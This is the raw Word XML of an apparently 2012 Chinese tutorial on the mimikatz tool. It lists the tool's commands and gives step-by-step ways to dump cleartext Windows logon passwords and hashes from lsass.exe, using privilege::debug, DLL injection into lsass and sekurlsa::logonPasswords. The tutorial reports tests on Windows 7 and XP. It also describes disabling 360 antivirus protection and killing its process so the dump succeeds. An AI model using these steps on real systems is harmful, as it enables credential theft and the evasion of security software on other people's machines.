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94" w:rsidRDefault="00F9105C" w:rsidP="00F9105C">
      <w:pPr>
        <w:jc w:val="center"/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神器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mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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使用详解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一</w:t>
      </w:r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.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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简介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mimikatz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是法国人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Gentil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Kiwi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编写的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一款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windows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平台下的神器，它具备很多功能，其中最亮的功能是直接从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lsass.exe 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进程里获取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windows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处于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active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状态账号的明文密码。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mimikatz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的功能不仅如此，它还可以提升进程权限，注入进程，读取进程内存等等，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mimikatz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包含了很多本地模块，更像是一个轻量级的调试器，其强大的功能还有待挖掘。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作者主页：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http://blog.gentilkiwi.com/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14F2D" w:rsidRDefault="00C14F2D" w:rsidP="00F9105C">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C14F2D" w:rsidRDefault="00C14F2D" w:rsidP="00F9105C">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C14F2D" w:rsidRDefault="00C14F2D" w:rsidP="00F9105C">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C14F2D" w:rsidRDefault="00C14F2D" w:rsidP="00F9105C">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs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二</w:t>
      </w:r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.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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基础命令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Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>随便输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00F9105C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”xxx::”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F9105C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，会提示</w:t>
      </w:r>
      <w:r w:rsidRPr="00F9105C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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F9105C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>modules:’xxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F9105C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>’ intr0uvable”,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F9105C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>大概意思就是你输入的命令不存在，然后会列出所有可用的命令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所有的模块与命令，如下图（左边的是模块名称，右边的是描述）：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105525" cy="3276600"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="32" name="图片 32" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/FF9CB523E1C04F5B8E9082D5FBE0D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8c7b23e27a17ec8bcb8234905c17ef3d/FF9CB523E1C04F5B8E9082D5FBE0DC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1.cls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清屏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2.exit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退出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3.version    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F9105C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F9105C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F9105C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的版本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438525" cy="485775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="31" name="图片 31" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/B51AF11760DF432D9CF464BA28859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e.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/B51AF11760DF432D9CF464BA28859E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4.help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查看帮助信息（全是法文，只能找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google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了）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124575" cy="1943100"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="30" name="图片 30" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/870E403DF0A549B2BAB204E2BBA56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te.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/870E403DF0A549B2BAB204E2BBA566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5.system::user    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F9105C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>查看当前登录的系统用户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562225" cy="457200"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="29" name="图片 29" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/973C54032B0C4CFA84C6B9795EA7B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te.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/973C54032B0C4CFA84C6B9795EA7BB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4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.system::computer    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F9105C">
        <w:rPr>
          <w:rFonts w:ascii="Simsun" w:eastAsia="宋体" w:hAnsi="Simsun" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>查看计算机名称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305050" cy="447675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="28" name="图片 28" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/23ACB7735CA04103B6B5E077728B8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te.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/23ACB7735CA04103B6B5E077728B8F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9105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7.process::list    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F9105C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>列出进程</w:t>
      </w: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781425" cy="1114425"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="27" name="图片 27" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/CD80F2B5D1C74F78B451078CD378F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te.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/CD80F2B5D1C74F78B451078CD378F9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8.process::suspend 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进程名称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暂停进程</w:t>
      </w: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181350" cy="466725"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="26" name="图片 26" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/0EF31E121398421B8FC226A4973234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te.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/0EF31E121398421B8FC226A4973234D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QQ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进程还在，只是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QQ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无法使用了。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9.process::stop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进程名称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结束进程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638425" cy="438150"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="25" name="图片 25" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/E1BB784E1F5B4E5AA92A81B886B53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ote.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/E1BB784E1F5B4E5AA92A81B886B53CC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10.process::modules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列出系统的核心模块及所在位置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96000" cy="2324100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="24" name="图片 24" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/56464C4268D5471DAAEE68B3D7729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ote.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/56464C4268D5471DAAEE68B3D77295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11.service::list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列出系统的服务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12.service::remove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移除系统的服务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13.service::start stop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服务名称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启动或停止服务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781300" cy="866775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="23" name="图片 23" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/113DAAD3AB7B49DA8C0C46F183297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te.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/113DAAD3AB7B49DA8C0C46F1832971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14.privilege::list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列出权限列表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15.privilege::enable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激活一个或多个权限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16.privilege::debug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提升权限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924300" cy="400050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22" name="图片 22" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/5BB146E37EB244A9BF0D7F2DBDB7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ote.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/5BB146E37EB244A9BF0D7F2DBDB708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17.nogpo::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cmd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打开系统的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cmd.exe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86000" cy="371475"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="21" name="图片 21" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/A2617662170943E3862AB34E23E0F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note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/A2617662170943E3862AB34E23E0FD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18.nogpo::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regedit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打开系统的注册表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105025" cy="371475"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="20" name="图片 20" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/5FB686563D9E4F8B99617FF34F0BC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ote.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/5FB686563D9E4F8B99617FF34F0BC0F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19.nogpo::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taskmgr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打开任务管理器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76475" cy="466725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="19" name="图片 19" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/B78B325C96264C27B8C6C132AAAE67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ote.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/B78B325C96264C27B8C6C132AAAE67F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20.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ts::sessions    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显示当前的会话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21.ts::processes</w:t>
      </w:r>
      <w:r w:rsidRPr="00F9105C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>    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显示进程和对应的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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情况等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22.sekurlsa::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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wdigest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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获取本地用户信息及密码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438525" cy="1190625"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="18" name="图片 18" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/B8E30254E6E94C8AB30FE2412BCEB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ote.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/B8E30254E6E94C8AB30FE2412BCEBB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23.sekurlsa::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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wdigest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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获取</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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kerberos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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用户信息及密码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81375" cy="1171575"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="17" name="图片 17" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/9742D21D9BEE49769BFFEA605004C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ote.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/9742D21D9BEE49769BFFEA605004C8C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24.sekurlsa::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tspkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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   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获取</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tspkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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用户信息及密码</w:t>
      </w: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400425" cy="1181100"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="16" name="图片 16" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/1DB2CBAAFE8542618295854288420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note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/1DB2CBAAFE85426182958542884200D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25.sekurlsa::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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logonPasswords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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   </w:t>
      </w:r>
      <w:r w:rsidRPr="00F9105C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>获登陆用户信息及密码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9105C" w:rsidRPr="00F9105C" w:rsidRDefault="00F9105C" w:rsidP="00F9105C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76950" cy="1828800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15" name="图片 15" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/126D9CA23586457AB0BD64CF9F613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note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/126D9CA23586457AB0BD64CF9F613A2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ps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：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1.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由于命令</w:t>
      </w:r>
      <w:r w:rsidR="00C14F2D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很多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，就不一一列出了。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      2.kerberos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是一种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网络认证协议。至于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tspkg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好像是与远程连接时的网络身份认证有关的。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三</w:t>
      </w:r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:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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获取用户名及密码的方法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方法一</w:t>
      </w:r>
      <w:r w:rsidRPr="00F9105C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：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1.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运行主程序：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mimikatz.exe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2.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输入：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privilege::debug      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提升权限</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9105C" w:rsidRPr="00F9105C" w:rsidRDefault="00F9105C" w:rsidP="00F9105C">
      <w:pPr>
        <w:widowControl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3.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输入：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inject::process lsass.exe sekurlsa.dll    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将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sekurlsa.dll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注入到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lsass.exe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中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4.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输入：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@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getLogonPasswords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    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即可获取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hash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和当前用户的明文密码！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原理就是登陆的时候输入的密码，经过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lsass.exe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里的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wdigest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和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tspkg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两个模块调用后，它们对之进行加密处理，而没有进行擦除，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而且该加密通过特征可以定位，并且按照微软的算法可逆。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只要登陆过，就可以抓出来，它进行枚举的。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简单地说，在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Windows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中，当用户登录时，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lsass.exe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使用一个可逆的算法，加密过的明文密码，并且把密文保存在内存中，没有清理，然后可以抓出来，还原。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也就是说，开机以后，只要是登陆过的用户，在没重启前（因为重启内存就清零了，这里不包括使用其他方法清理内存），都可以抓出来，注销也是无用的，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因为内存中的密码并没有清除，所以还是可以抓出来的。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方法二（直接调用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F910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sekurlsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F910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模块）</w:t>
      </w:r>
      <w:r w:rsidRPr="00F910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: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1.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运行主程序：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mimikatz.exe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2. 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输入：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privilege::debug      </w:t>
      </w:r>
      <w:r w:rsidRPr="00F9105C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>提升权限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3.</w:t>
      </w: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输入：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sekurlsa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::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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logonPasswords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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full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924300" cy="3295650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="图片 14" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/F1E50B4EB1634B53ACF14EC0AD3974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ote.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/F1E50B4EB1634B53ACF14EC0AD39744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Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>或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438525" cy="1190625"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="13" name="图片 13" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/B07A73C5D1D9471CA6A82BB59E1CA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note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/B07A73C5D1D9471CA6A82BB59E1CAE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81375" cy="1171575"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="12" name="图片 12" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/550E9155C00542B1926C3B7A24887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note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/550E9155C00542B1926C3B7A24887D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400425" cy="1181100"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="11" name="图片 11" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/7CDB728FC1EB49F89AFAB22937B6E1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note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/7CDB728FC1EB49F89AFAB22937B6E1A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四</w:t>
      </w:r>
      <w:r w:rsidRPr="00F910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.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F9105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实际测试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一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测试系统：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Windows 7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旗舰版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测试情况如下图：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124575" cy="4371975"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="10" name="图片 10" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/7DE2AC93E1364740B8DA7FB0B61B43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note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/7DE2AC93E1364740B8DA7FB0B61B433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在网上看到一些文章说，安装了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360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之类的杀毒软件后，神器就无法使用了，于是在本地测试了一下。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无论是启动着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360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，还是退出了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360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，都会出来下面的情况。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就是在输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00F9105C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inject::process lsass.exe sekurlsa.dll时提示：拒绝访问(如下图)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438650" cy="600075"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="9" name="图片 9" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/A2881306866F4377BD15380E5F769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note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/A2881306866F4377BD15380E5F7690E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微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="464646"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>后来到进程里看了一下，原来360的主动防御进程还在，</w:t>
      </w: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657725" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="8" name="图片 8" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/9CA665500B804A8890FDCB69D9173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note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/9CA665500B804A8890FDCB69D91736A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接着把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360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的实时防护全部关掉，再把那个进程结束掉就可以正常使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F9105C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mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F9105C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了。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二.测试系统：Windows XP专业版sp3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测试情况如下图：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276975" cy="4219575"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="7" name="图片 7" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/539DD6FC9E624E93B0B9FF95A398F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note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/539DD6FC9E624E93B0B9FF95A398F7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三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测试环境：远程连接一台虚拟机中的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Windows 7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旗舰版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095875" cy="2924175"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="6" name="图片 6" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/4C6DF16996A84FA48CCF90B8D7ED8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note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/4C6DF16996A84FA48CCF90B8D7ED8CC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直接运行</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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提权时会提示错误，如下图：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724650" cy="1466850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="图片 5" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/9CEC0AFC1FCF4D4C9D7C94AEB9B262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note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/9CEC0AFC1FCF4D4C9D7C94AEB9B262D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大意是提示权限不足吧。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后来用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“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以管理员身体运行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就可以了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981575" cy="2095500"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="4" name="图片 4" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/5B1448C7242949AA993C68A9A00863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note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/5B1448C7242949AA993C68A9A00863B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F9105C" w:rsidRPr="00F9105C" w:rsidRDefault="00F9105C" w:rsidP="00630762">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="center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t>测试情况如下：</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00C14F2D"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 wp14:anchorId="58CB1A99" wp14:editId="02C833CE">
            <wp:extent cx="4400550" cy="3230462"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="3" name="图片 3" descr="http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/C6C2764D39CA442294E0EA487F0C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note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/C6C2764D39CA442294E0EA487F0C297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3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105C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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9105C" w:rsidRPr="00F9105C" w:rsidRDefault="00F9105C" w:rsidP="00F9105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sectPr w:rsidR="00F9105C" w:rsidRPr="00F9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0"/>
    <w:rsid w:val="002C1D94"/>
    <w:rsid w:val="00630762"/>
    <w:rsid w:val="00C14F2D"/>
    <w:rsid w:val="00F9105C"/>
    <w:rsid w:val="00F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910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10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910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1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349</Words>
  <Characters>1990</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>16</Lines>
  <Paragraphs>4</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Sky123.Org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imkh</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>imkh</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-11-20T09:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-11-20T09:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>